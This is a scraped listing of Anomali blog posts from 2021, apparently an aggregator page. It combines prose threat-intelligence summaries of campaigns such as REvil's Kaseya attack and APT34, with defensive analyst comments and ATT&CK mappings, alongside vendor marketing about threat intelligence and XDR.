Analyst Comment: Network defense-in-depth and adherence to information security best practices can assist organizations in reducing the risk. Pay special attention to the patch and vulnerability management, protecting credentials, and continuing network hygiene and monitoring. When possible, enforce the principle of least privilege, use segmentation and strict access control measures for critical data. Organisations can use Anomali Match to perform real time forensic analysis for tracking such attacks.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Exploitation of Remote Services - T1210
Tags: Hafnium, Judgement Panda, APT31, TEMP.Jumper, APT40, Kryptonite Panda, Zirconium, Leviathan, TEMP.Periscope, Microsoft Exchange, CVE-2021-26857, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, Government, EU, UK, North America, China
NSO’s Spyware Sold to Authoritarian Regimes Used to Target Activists, Politicians and Journalists
(published: July 18, 2021)
Israeli surveillance company NSO Group supposedly sells spyware to vetted governments bodies to fight crime and terrorism. New research discovered NSO’s tools being used against non-criminal actors, pro-democracy activists and journalists investigating corruption, political opponents and government critics, diplomats, etc. In some cases, the timeline of this surveillance coincided with journalists' arrests and even murders. The main penetration tool used by NSO is malware Pegasus that targets both iPho |
Ransomware Malware Tool Vulnerability Threat Studies Guideline Industrial | APT 41 APT 40 APT 28 APT 31 | |
|
2021-07-13 15:00:00 | Cyber Threat Intelligence Combined with MITRE ATT&CK Provides Strategic Advantage over Cyber Threats (lien direct) | Many security executives have fundamental familiarity with the MITRE ATT&CK framework, although most perceive it within a narrow set of use cases specific to deeply-technical cyber threat intelligence (CTI) analysts. The truth though, is that when integrated into overall security operations, it can produce profound security and risk benefits. What is MITRE ATT&CK? MITRE ATT&CK serves as a global knowledge base for understanding threats across their entire lifecycle. The framework’s differentiator is its focus on tactics, techniques, and procedures (TTPs) that threats use to operate in the real world, rather than just on typical indicators like IP addresses, file hashes, registry keys, and so on. MITRE ATT&CK offers a rigorous and holistic method for understanding the types of adversaries operating in the wild and their most observed behaviors, and for defining and classifying those behaviors with a common taxonomy. This is an advantage that brings a much-needed level of organization to the chaotic threat landscape organizations face. MITRE ATT&CK has practical applications across a range of security functions when security tooling and processes are mapped to it. By characterizing threats and their TTPs in a standardized way and visualizing them through the MITRE ATT&CK matrix, the framework makes it easier for security leaders and their direct reports to determine and communicate the highest priority threats they are facing and to take more sweeping, strategic actions to mitigate them. In the Weeds? Yes and No At first glance, MITRE ATT&CK can be intimidating. It may even seem too technically in the weeds for executives who are grappling with leadership-level security concerns. However, the truth is that MITRE ATT&CK holds tremendous strategic potential. It can also help accelerate the cybersecurity maturation process. The framework does undoubtedly help security practitioners with their day-to-day technical analysis, making them better at their jobs. However, when used to its full potential, MITRE ATT&CK can help security executives gain better value out of existing technologies, with threat intelligence platforms (TIPs), SIEMs, and other security analytics tools being among these. More importantly, it helps establish strategic visibility into gaps in controls, making it easier to prioritize security investments in people, processes, services, and solutions. CISOs and other security executives could almost think of it as a tool that automates the creation of a roadmap, showing them precisely where the onramps to threats are located in their networks and what vehicles adversaries are using to enter. Let’s take a closer look at how MITRE ATT&CK works and why those in charge of security shouldn’t wait to adopt it into their strategic arsenals. Programmatic Benefits Having established that MITRE ATT&CK provides value to security leaders, let’s consider a few of the genuine benefits it delivers, as it isn’t just in the day-to-day minutiae of security operations where MITRE ATT&CK shines. Overlay. When an organization overlays its existing security posture and controls on top of MITRE ATT&CK-contextualized CTI, it becomes much easier to identify the riskiest control gaps present in the security ecosystem. Productivity. When looking at workflows and the teams available to respond to the MITRE ATT&CK-delineated TTPs most likely to target the organization, leaders can more easily identify at-risk talent and process gaps and then take steps to better address both. Prioritization. As security leaders go through their regularly scheduled validation of security coverage, they should leverage their CTI to identify the most common TTPs relevant to their environments. MITRE ATT&CK can crisply articulate this. With an understanding of where their biggest risks reside, executiv | Tool Threat Guideline | ||
|
2021-07-06 15:05:00 | Anomali Cyber Watch: Thousands attacked as REvil ransomware hijacks Kaseya VSA, Leaked Babuk Locker Ransomware Builder Used In New Attacks and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Babuk, IndigoZebra, Ransomware, REvil, Skimmer, Zero-day and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Shutdown Kaseya VSA Servers Now Amidst Cascading REvil Attack Against MSPs, Clients
(published: July 4, 2021)
A severe ransomware attack reportedly took place against the popular remote monitoring and management (RMM) software tool Kaseya VSA. On July 2, 2021, Kaseya urged users to shut down their VSA servers to prevent them from being compromised. The company estimated that fewer than 40 of their customers worldwide were affected, but as some of them were managed service providers (MSPs), over 1,000 businesses were infected. The majority of known victims are in the US with some in Europe (Sweden) and New Zealand. The attackers exploited a zero-day vulnerability in Kaseya’s systems that the company was in the process of fixing. It was part of the administrative interface vulnerabilities in tools for system administration previously identified by Wietse Boonstra, a DIVD researcher. The REvil payload was delivered via Kaseya software using a custom dropper that dropped two files. A dropper opens an old but legitimate copy of Windows Defender (MsMpEng.exe) that then side loads and executes the custom malicious loader's export. The attack coincided with the start of the US Independence Day weekend, and has several politically-charged strings, such as “BlackLivesMatter” Windows registry key and “DTrump4ever” as a password.
Analyst Comment: Kaseya VSA clients should safely follow the company’s recommendations as it advised shutting Kaseya VSA servers down, and is making new security updates available. Every organization should have a ransomware disaster recovery plan even if it is serviced by a managed service provider (MSP).
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] DLL Side-Loading - T1073
Tags: REvil, Sodinokibi, Gandcrab, Leafroller, Kaseya VSA, ransomware, Ransomware-as-a- Service, zero-day, CVE-2021-30116, supply-chain, North America, USA, Sweden, New Zealand, MSP, RMM, schools
IndigoZebra APT Continues To Attack Central Asia With Evolving Tools
(published: July 1, 2021)
Researchers from Check Point have identified the Afghan Government as the latest victim in a cyber espionage campaign by the suspected Chinese group ‘IndigoZebra’. This attack began in April when Afghan National Security Council (NSC) officials began to receive lure emails claiming to be from the President’s secretariat. These emails included a decoy file that would install the backdoor ‘BoxCaon’ on the system before reaching out to the Dropbox API to act as a C&C server. The attacker would then be able to fingerprint the machine and begin accessing files. I |
Ransomware Spam Malware Tool Vulnerability Threat Guideline | APT 19 APT 10 | |
|
2021-06-23 15:45:00 | Anomali is Investing in Intelligence Powered Cloud XDR (lien direct) | Our Match XDR Use Cases Stop Breaches I want to extend my gratitude to the various CISOs that I have spent time with during my first three months at Anomali, and the many more that I will be talking to soon. You recognize us as the market leader in global threat intelligence that is enriched by being the hub of threat sharing across trusted circles. You also credit our ThreatStream product for seamless integration with your SIEM, Network, EDR and other security technologies. Some of you have adopted our Match product to deliver specific and powerful use cases in extended detection and response (XDR). Coupled with big data ingestion, we use machine learning and AI to help you stop significant breaches. Today, we are excited to announce that Anomali is investing in intelligence powered cloud XDR using our Match product use cases as the starting foundation. We are ready to have conversations with those of you that want to explore our current Match use cases as well as conversations about cloud XDR, which we expect to deliver later in our fiscal year. If you currently use Match, we expect to provide you with a choice of bridging to cloud XDR. Our mission is to help you improve your security posture and build cyber resilience by stopping breaches, which all starts and ends with intelligence. The best outcome is when we have your feedback, and we work together – please reach out to us. | Threat Guideline | ||
|
2021-06-08 15:00:00 | Anomali Cyber Watch: TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations, Necro Python Bots Adds New Tricks, US Seizes Domains Used by APT29 and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, APT29, FluBot, Necro Python, RoyalRoad, SharpPanda, TeaBot and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations
(published: June 4, 2021)
Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP.
Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts.
MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069
Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates
Necro Python Bots Adds New Tricks
(published: June 3, 2021)
Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms.
Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover.
MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219
Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig
New SkinnyBoy Ma |
Ransomware Malware Vulnerability Threat Patching Guideline | APT 29 APT 28 | |
|
2021-05-26 17:20:00 | Threat Intelligence Platforms Help Organizations Overcome Key Security Hurdles (lien direct) | Dealing with Big Data, Providing Context, Integration, and Fast Understanding of New Threats are Among the Benefits Threat Intelligence Platforms or TIPs Provide When industry analysts survey most security professionals these days, the common consensus is that it’s now harder to manage security operations than ever before. For example, a recent Enterprise Strategy Group (ESG) research study showed that some 63 percent of security pros say that the job is tougher today than it was just two years ago. While there's no doubt that the variety and volume of threats keep on growing by the year, the question is whether or not it’s the complexity of the security problems that have risen precipitously, or whether something else is going on. I'd argue that it's mostly the latter, in that it’s not so much that the complexity has grown tremendously over this time so much as the “awareness” of already latent complexity has become more apparent. As the breadth of technologies and data available to modern cybersecurity organizations continues to proliferate, security strategists are finally getting enough visibility into their environments to start discovering gaps that have existed all along. But knowing where the deficiencies exist doesn’t always equate to being able to address them. These same security folks are also struggling to wrap their arms around what is possible to achieve by using the array of tools in their arsenals and the vast quantities of information available. Years ago in the security world, the common mantra was that security organizations “don't know what they don't know” and this was due to deficiencies in monitoring and threat intelligence capabilities. Nowadays the opposite is true. They're flooded with data and they're starting to get a better sense of what they don't fully know or understand about adversarial activities in their environments. But this dawning self-awareness can be quite nerve-wracking as they ask themselves, “Now that I know, what should I do?” It can be daunting to make that jump from understanding to taking action—this is the process that many organizations struggle with when we talk about “operationalizing” threat intelligence. For security operations, it’s not enough to just know about an adversary via various threat feeds and other sources. To take action, threat intelligence needs to be deployed in real-time so that security tools and personnel can actually leverage it to run investigations, detect the presence of threats in their networks, respond faster, and continuously improve their security architectures. But there are many significant hurdles in running security operations that stand in the way of achieving those goals. This is where a robust threat intelligence platform (TIP) can add significant value to the security ecosystem. TIPs help security operations teams tackle some of the greatest hurdles. Big Data Conundrum with Threat Intelligence Platforms The first challenge is that the sheer volume of threat intelligence made available to security teams has become a big data problem, one that can't be solved by just filtering out the feeds that are in use, which would defeat the purpose of acquiring varied and relevant feeds in the first place. Organizations don't want to ingest millions or billions of evolving threat indicators into their security information and event manager (SIEM), which would be cost-prohibitive but also lead to the creation of unmanageable levels of false positives. This is where Anomali comes in, with a TIP doing the work on the front end, interesting and pre-curated threat “matches” can be integrated directly into your SIEM. These matches prese | Tool Threat Guideline | Solardwinds Solardwinds | |
|
2021-05-25 15:00:00 | Anomali Cyber Watch: Bizzaro Trojan Expands to Europe, Fake Call Centers Help Spread BazarLoader Malware, Toshiba Business Reportedly Hit by DarkSide Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: BazarCall, DarkSide, Data breach, Malware, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Air India passenger data breach reveals SITA hack worse than first thought
(published: May 23, 2021)
Adding to the growing body of knowledge related to the March 2021 breach of SITA, a multinational information technology company providing IT and telecommunication services to the air transport industry, Air India announced over the weekend that the personal information of 4.5 million customers was compromised. According to the airline, the stolen information included passengers’ name, credit card details, date of birth, contact information, passport information, ticket information, Star Alliance and Air India frequent flyer data. The compromise included data for passengers who registered with Indian Airlines between 26 August 2011 and 3 February 2021; nearly a decade. Air India adds to the growing list of SITA clients impacted by their data breach, including Malaysia Airlines, Finnair, Singapore Airlines, Jeju Air, Cathay Pacific, Air New Zealand, and Lufthansa.
Analyst Comment: Unfortunately, breaches like this are commonplace. While customers have no control over their information being included in such a breach, they can and should take appropriate actions once notified they may be impacted, Those actions can include changing passwords and credit cards associated with the breached accounts, engaging with credit reporting agencies for enhanced credit monitoring or freezing of credit inquiries without permission, and reaching out to companies that have reportedly been breached to learn what protections they may be offering their clients.
Tags: Data Breach, Airline, PII
BazarCall: Call Centers Help Spread BazarLoader Malware
(published: May 19, 2021)
Researchers from PaloAlto’s Unit42 released a breakdown of a new infection method for the BazarLoader malware. Once installed, BazarLoader provides backdoor access to an infected Windows host which criminals can use to scan the environment, send follow-up malware, and exploit other vulnerable hosts on the network. In early February 2021, researchers began to report a “call center” method of distributing BazarLoader. Actors would send phishing emails with trial subscription-based themes encouraging victims to phone a number to unsubscribe. If a victim called, the actor would answer the phone and direct the victim through a process to infect the computer with BazarLoader. Analysts dubbed this method of infection “BazarCall.”
Analyst Comment: This exemplifies social engineering tactics threat actors employ to trick users into installing malware on their machines. All social media users should be cautious when accepting unknown requests to connect, and particularly cautious when receiving communication from unknown users. Even if cal |
Ransomware Data Breach Malware Hack Tool Vulnerability Threat Guideline | ||
|
2021-05-19 16:45:00 | Forrester Tech Tide for Threat Intelligence Recognizes Anomali (lien direct) | Threat Intelligence Increasingly Viewed as Adding High Business Value and Increased Resiliency, According to Leading Cybersecurity Report Adversaries will eventually compromise every organization. When the world woke to the news that the Colonial Pipeline was the latest major enterprise to join the ransomware victims’ club, we once again had to accept this notion. With this fact of digital life now almost universally recognized, CISOs are starting to look for technologies and services that can help them build a higher resiliency level across their infrastructures. When trying to decide how and where to invest their scarce security budgets, leaders can find themselves uncertain as they sort through overwhelming amounts of marketing content available to them. To provide our customers and prospects with a better understanding of our role in helping them achieve their security and risk goals, we frequently engage with analyst organizations that provide objective, third-party information about what we offer and how we add value. Recently, Anomali was recognized in the Forrester Tech Tide™: Threat Intelligence, Q2 2021. We believe readers will find the report particularly useful in understanding why threat intelligence is now a key driver of resiliency and why it has moved from the “nice to have” to the “must-have” column. According to the report: Threat intelligence is increasingly critical to firms’ ability to manage cyber risk and build resilient security programs. To accelerate their threat intelligence performance, firms are evaluating and adopting multiple services and technologies. This Forrester Tech Tide™ report presents an analysis of the maturity and business value of the 15 service and technology categories that enable an effective threat intelligence-driven security program. Security and risk pros should read this report to shape their firm’s investment approach to these technologies. Forrester analysts positioned Anomali in the “Intelligence Management Solutions” section, which they ranked as “high” in business value and designated with an “invest” rating. According to the report: Security professionals can become overwhelmed with the amount of data and alerts they receive. Intelligence management solutions provide processes for intelligence professionals to manage stakeholder requirements, automate intelligence collection, maximize data analysis, and operationalize the intelligence. Although the full range of capabilities and strategic security advantages we offer extend beyond this evaluation, this positioning further validates how the Anomali product suite of intelligence-driven cybersecurity solutions addresses the key benefits outlined. No cybersecurity vendor is an island, which is why a layered approach to security will always be needed to ensure protection against the rising level of sophisticated and stealthy attacks organizations face. In addition to validating more deeply several of the security areas that Anomali helps its customers to address, the report also provides insights into the wide range of threat intelligence technologies on the market today, which includes a look at several of our key partners in the Anomali ecosystem — the deepest and widest available on the market today. To read more about how the essential solutions that Anomali provides can help your organization to minimize the risk of falling victim to damaging cyberattacks, download the full Forrester Tech Tide™: Threat Intelligence, Q2 2021. | Ransomware Threat Guideline | ||
|
2021-05-18 19:05:00 | Anomali Cyber Watch: Microsoft Azure Vulnerability Discovered, MSBuild Used to Deliver Malware, Esclation of Avaddon Ransomware and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Android, Malware, Ransomware, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Cross-Browser Tracking Vulnerability Tracks You Via Installed Apps
(published: May 14, 2021)
A new method of fingerprinting users has been developed using any browser. Using URL schemes, certain applications can be launched from the browser. With this knowledge, an attacker can flood a client with multiple URL schemes to determine installed applications and create a fingerprint. Google Chrome has certain protections against this attack, but a workaround exists when using the built-in PDF viewer; this resets a flag used for flood protection. The only known protection against scheme flooding is to use browsers across multiple devices.
Analyst Comment: It is critical that the latest security patches be applied as soon as possible to the web browser used by your company. Vulnerabilities are discovered relatively frequently, and it is paramount to install the security patches because the vulnerabilities are often posted to open sources where any malicious actor could attempt to mimic the techniques that are described.
Tags: Scheme Flooding, Vulnerability, Chrome, Firefox, Edge
Threat Actors Use MSBuild to Deliver RATs Filelessly
(published: May 13, 2021)
Anomali Threat Research have identified a campaign in which threat actors are using MSBuild project files to deliver malware. The project files contain a payload, either Remcos RAT, RedLine, or QuasarRAT, with shellcode used to inject that payload into memory. Using this technique the malware is delivered filelessly, allowing the malware to evade detection.
Analyst Comment: Threat actors are always looking for new ways to evade detection. Users should make use of a runtime protection solution that can detect memory based attacks.
MITRE ATT&CK: [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Trusted Developer Utilities - T1127 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Account Discovery - T1087 | [MITRE ATT&CK] File and Directory Discovery - T1083 | |
Ransomware Malware Vulnerability Threat Guideline | APT 36 | |
|
2021-05-17 20:44:00 | Cyber Self-Defense Is Not Complicated (lien direct) | Anomali Sr. Director of Cyber Intelligence Strategy A.J. Nash recently penned a column for United States Cybersecurity Magazine about how few people in the modern world are immune to the threat of a cyber-attack. Hence, the importance of cyber self-defense. In “Cyber Self-Defense Is Not Complicated,” A.J. talks about why self-commitment is an increasingly effective way to minimize the risks that certainly lurk. Whether it be texts that include personal content not meant for public consumption, emails, hard drives, cloud storage containing sensitive business information, or the endless supply of finance transaction data that most of us pass across the Internet daily, few people in the modern world are immune to the threat of a cyber-attack. Hence, the importance of cyber self-defense. The most common avenue of attack for cyber actors continues to be phishing. Phishing enables cybercriminals to gain the access needed for a ransomware attack, cyber extortion, or the theft of personally identifiable information (PII) which is used to steal money or identities. While the threat of compromise may be daunting to many who do not see themselves as very technical, even those with limited knowledge can employ a few simple techniques and tools to greatly reduce the potential for being compromised. Before we talk solutions, let us briefly examine the common threats most of us face and nearly all of us can minimize through simple cyber self-defense. 4 Common Threats Faced in Cyberspace Phishing: Someone poses as a legitimate institution or individual in an email or text to lure victims into providing sensitive data such as PII, banking and credit card details, and passwords. Ransomware: Malware that prevents or limits users from accessing their system, either by locking the system’s screen or by locking the users’ files until a ransom is paid. Theft of PII: The theft of data that may include a Social Security number, date of birth, driver’s license number, bank account and financial information, as well as a passport number. All this data can be assembled into a full financial record file (AKA, “fullz”) for identity theft. These reportedly sell for as little as $8/each on cybercriminal markets across the Dark Web. Cyber Extortion/Blackmail: A crime in which a threat actor demands payment to prevent the release of potentially embarrassing or damaging information. In most cases involving individual victims (not companies), a threat actor pretends to have compromised a victim’s computer or an account tied to something embarrassing. By quoting credentials usually gathered from a previously published breach, the threat actor quotes those credentials as “evidence” of access to the more embarrassing data. Because people commonly use the same credentials for multiple accounts, this bluff often works, leading to the victim being forced to provide more embarrassing content for extortion, pay money, or both. Cyber Self-Defense Practices: Safely Using Wi-Fi and Bluetooth Wireless connectivity to the Internet and other devices is one of the most convenient inventions in recent memory. Unfortunately, these technologies also come with risks many users fail to recognize or mitigate. Thankfully, it only takes a few simple changes to greatly reduce the risk of personal compromise and practice cyber self-defense. Keep Wi-Fi and Bluetooth features turned off on mobile phones and la | Malware Hack Threat Guideline | ||
|
2021-05-10 17:56:00 | Rise of the Chief Intelligence Officer (CINO) (lien direct) | Anomali Sr. Director of Cyber Intelligence Strategy A.J. Nash recently penned a column for United States Cybersecurity Magazine about how changing security challenges call for new skillsets and leadership professionals, who can help to develop ad run new programs that keep pace with modern adversaries. In “Rise of the Chief Intelligence Officer (CINO),” A.J. makes a case for why this position is needed and what such a leader’s skill set and experience should include. It is republished here in its entirety and with full permission. In response to growing threats in cyberspace, private sector organizations began creating Intelligence programs nearly a decade ago, usually referred to as Cyber Threat Intelligence (CTI). In theory, the private sector was attempting to replicate what the government has successfully done for generations: gain informational advantage to prevent enemy victories and mitigate damage from enemy successes. While most large enterprises today have some sort of a CTI program, the majority are using the word “intelligence” without the tradecraft, standards, or processes to support the label. “Intelligence” in the private sector is still primarily tactical and technical cybersecurity led by people with backgrounds to match. Best practices for collection, production, and dissemination of intelligence are rarely known by those charged with the responsibilities of an intelligence organization. Moreover, only a handful of companies have integrated intelligence into enterprise-wide processes for optimization of outputs that meet documented organizational goals and objectives. Instead of being intelligence-driven security practices, much of the private sector remains underinvested and underprepared. Worse yet, most organizations with CTI programs, even effective ones, restrict their own ability to capitalize on the time and money invested in CTI because their vision for Intelligence is limited to the Security Operations Center (SOC). The root cause for these challenges is a fundamental misunderstanding of intelligence, borne out of ignorance for the differences between Cybersecurity and Intelligence as independent career fields. Instead of being focused on Indicators Of Compromise (IOCs), signatures, and response actions, Intelligence should be a means of countering threats, cybersecurity or otherwise, and driving enterprise-wide improvements in risk reduction. The answer to this challenge is to capitalize on the lessons learned by the U.S. Government (USG) regarding Intelligence. Just as there is a Director of National Intelligence (DNI) who reports directly to the President and leads the U.S. Intelligence Community “in intelligence integration, forging a community that delivers the most insightful intelligence possible,”[1] private sector enterprises each need a single Intelligence leader reporting directly to the CEO, President, or Board of Directors. Instead of the sole intelligence function of a company being a CTI team buried inside the SOC and focused on defensive cyber operations or the needs of the Chief Information Security Officer (CISO), establishment of the Chief Intelligence Officer (CINO) will enable companies to maximize the value of their investments, eliminate redundancies, and reduce risk. In the 1980’s, as C-suites expanded to include Chief Information Officers (CIO),and in the 2010’s, to include Chief Security Officers (CSO) and Chief Human Resources Officers (CHRO), it is time to open a new seat at the table for the first Chief Intelligence Officer (CINO). The Ideal CINO Candidate When adding a chair in the boardroom, it is important to assess what unique value the new addition will bring to the Executive Staff (E-Staff). The skills and experiences needed for the newly minted CINO start with a deep knowledge of traditional intelligence standards and practices as well as impeccable integrity and judgement. This will be the senior expert on Intelligence a | Threat Guideline | ||
|
2021-05-04 15:25:00 | Anomali Cyber Watch: Microsoft Office SharePoint Servers Targeted with Ransomware, New Commodity Crypto-Stealer and RAT, Linux Backdoor Targeting Users for Years, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data Theft, Backdoor, Ransomware, Targeted Ransomware Attacks and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Python Also Impacted by Critical IP Address Validation Vulnerability
(published: May 1, 2021)
Researchers have recently discovered that a bug previously discovered in netmask (a tool to assist with IP address scoping) is also present in recent versions of Python 3. The bug involves the handling of leading zeroes in decimal represented IP addresses. Instead of interpreting these as octal notation as specified in the standard, the python ipaddress library strips these and interprets the initial zero and interprets the rest as a decimal. This could allow unauthenticated remote attackers to perform a number of attacks against programs that rely on python's stdlib ipdaddress library, including Server-Side Request Forgery (SSRF), Remote File Inclusion (RFI), and Local File Inclusion (LFI).
Analyst Comment: Best practices for developers include input validation and sanitization, which in this case would avoid this bug by validating or rejecting IP addresses. Additionally regular patch and update schedules will allow for rapid addressing of bugs as they are discovered and patches delivered. Proper network monitoring and policies are also an important part of protecting against these types of attacks.
Tags: CVE-2021-29921, python
Codecov Begins Notifying Affected Customers, Discloses IOCs
(published: April 30, 2021)
Codecov has disclosed multiple IP addresses as IOCs that were used by the threat actors to collect sensitive information (environment variables) from the affected customers. The company disclosed a supply-chain breach on April 15, 2021, and has now begun notifying customers. The breach went undiscovered for 2 months, and leveraged the Codecov Bash Uploader scripts used by a large number of projects.
Analyst Comment: In light of the increasing frequency and sophistication of supply chain attacks, companies should carefully audit, examine, and include in their threat modelling means of mitigating and detecting third party compromises. A resilient and tested backup and restore policy is an important part of the overall security strategy.
Tags: North America, Codecov, supply chain
FBI Teams up with ‘Have I Been Pwned’ to Alert Emotet Victims
(published: April 30, 2021)
The FBI has shared more than 4.3 million email addresses with data breach tracking site Have I Been Pwned. The data breach notification site allows you to check if your login credentials may have been compromised by Emotet. In total, 4,324,770 email addresses were provided which span a wide range of countries and domains. The addresses are actually sourced from 2 separate corpuses of data obtained by the agencies.
Analyst Comment: Frequently updated endpoint detection policies as well as network security |
Ransomware Data Breach Malware Tool Vulnerability Threat Patching Guideline | ||
|
2021-04-13 15:49:00 | Anomali Cyber Watch: Android Malware, Government, Middle East and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cobalt Group, FIN6, NetWalker, OilRig, Rocke Group, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Iran’s APT34 Returns with an Updated Arsenal
(published: April 8, 2021)
Check Point Research discovered evidence of a new campaign by the Iranian threat group APT34. The threat group has been actively retooling and updating its payload arsenal to try and avoid detection. They have created several different malware variants whose ultimate purpose remained the same, to gain the initial foothold on the targeted device.
Analyst Comment: Threat actors are always innovating new methods and update tools used to carry out attacks. Always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).
MITRE ATT&CK: [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] Custom Cryptographic Protocol - T1024 | [MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Remote File Copy - T1105 | [MITRE ATT&CK] Scripting - T1064
Tags: OilRig, APT34, DNSpionage, Lab Dookhtegan, TONEDEAF, Dookhtegan, Karkoff, DNSpionage, Government, Middle East
New Wormable Android Malware Spreads by Creating Auto-Replies to Messages in WhatsApp
(published: April 7, 2021)
Check Point Research recently discovered Android malware on Google Play hidden in a fake application that is capable of spreading itself via users’ WhatsApp messages. The malware is capable of automatically replying to victim’s incoming WhatsApp messages with a payload received from a command-and-control (C2) server. This unique method could have enabled threat actors to distribute phishing attacks, spread false information or steal credentials and data from users’ WhatsApp accounts, and more.
Analyst Comment: Users’ personal mobile has many enterprise applications installed like Multifactor Authenticator, Email Client, etc which increases the risk for the enterprise even further. Users should be wary of download links or attachments that they receive via WhatsApp or other messaging apps, even when they appear to come from trusted contacts or messaging groups. The latest security patches should be installed for both applications and the operating system.
Tags: Android, FlixOnline, WhatsApp
|
Ransomware Malware Vulnerability Threat Guideline | APT 34 | |
|
2021-03-17 18:03:00 | Anomali Cyber Watch: APT, Ransomware, Vulnerabilities and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, AlientBot, Clast82, China, DearCry, RedXOR, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Google: This Spectre proof-of-concept shows how dangerous these attacks can be
(published: March 15, 2021)
Google has released a proof of concept (PoC) code to demonstrate the practicality of Spectre side-channel attacks against a browser's JavaScript engine to leak information from its memory. Spectre targeted the process in modern CPUs called speculative execution to leak secrets such as passwords from one site to another. While the PoC demonstrates the JavaScript Spectre attack against Chrome 88's V8 JavaScript engine on an Intel Core i7-6500U CPU on Linux, Google notes it can easily be tweaked for other CPUs, browser versions and operating systems.
Analyst Comment: As the density of microchip manufacturing continues to increase, side-channel attacks are likely to be found across many architectures and are difficult (and in some cases impossible) to remediate in software. The PoC of the practicality of performing such an attack using javascript emphasises that developers of both software and hardware be aware of these types of attacks and the means by which they can be used to invalidate existing security controls.
Tags: CVE-2017-5753
Threat Assessment: DearCry Ransomware
(published: March 12, 2021)
